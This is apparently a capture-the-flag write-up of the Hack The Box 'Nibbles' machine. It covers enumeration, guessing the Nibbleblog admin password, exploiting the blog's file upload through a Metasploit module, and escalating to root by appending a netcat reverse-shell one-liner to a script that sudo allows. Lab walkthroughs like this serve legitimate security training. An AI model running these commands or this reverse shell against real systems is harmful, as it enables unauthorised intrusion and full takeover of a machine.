# HTB | Nibbles This is the Box on [Hack The Box Linux Privilege Escalation 101 Track](https://app.hackthebox.com/tracks/Linux-Privilege-Escalation-101). Find the box [here](https://app.hackthebox.com/machines/121). #### Skill Learned * Enumerating web applications * Guessing probable passwords ## NMAP IP: **10.10.10.75** ``` nmap -sT -p- --min-rate 10000 10.10.10.75 ```
``` nmap -sC -sV -p 22,80 10.10.10.75 ```

nmap scan

### Port 80 Let's visit port 80

port 80

nothing was there on dirsearch

dirsearch

on looking at the source code we found `/nibbleblog/`

/nibblelog

Let's fuzz the directory ``` dirsearch -u http://10.10.10.75/nibbleblog/ -x 404,403 ```

dirsearch

found

/nibbleblog/content/private/users.xml

## Foothold/shell since we have a username let's try to login

/nibbleblog/admin.php

I tried a bunch of passwords admin:admin, admin:Nibble, admin:nibble, admin:nibbles the last one worked

nibbleblog dashboard

we have also found ; here we found its version

/nibbleblog/README

Now there are two ways * [CVE-2015-6967](https://github.com/dix0nym/CVE-2015-6967) * Metasploit -> multi/http/nibbleblog\_file\_upload I used Metasploit, change the options as below ``` set USERNAME admin set PASSWORD nibbles set RHOST 10.10.10.75 set RPORT 80 set TARGETURI /nibbleblog/ ```

multi/http/nibbleblog_file_upload

we found user.txt

user.txt

## Priv Esc we found that we can run */home/nibbler/personal/stuff/monitor.sh* without password

sudo -l

since we can run the script as sudo we can modify it to get root let's append reverse shell to monitor.sh ``` echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f" >> monitor.sh sudo /home/nibbler/personal/stuff/monitor.sh ```

root.txt

we are in and found root.txt